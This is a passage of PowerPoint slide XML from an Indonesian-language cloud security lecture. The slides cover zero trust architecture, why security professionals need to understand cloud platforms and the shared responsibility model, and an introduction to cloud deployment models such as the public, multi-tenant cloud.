              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust.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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199080921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Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform cloud sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI modern. Seiring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengadopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mahir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemahaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menavigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkolaborasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perkembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanskap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</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127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8511559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Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengklasifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikategorikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Publik (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> multi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>penyewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
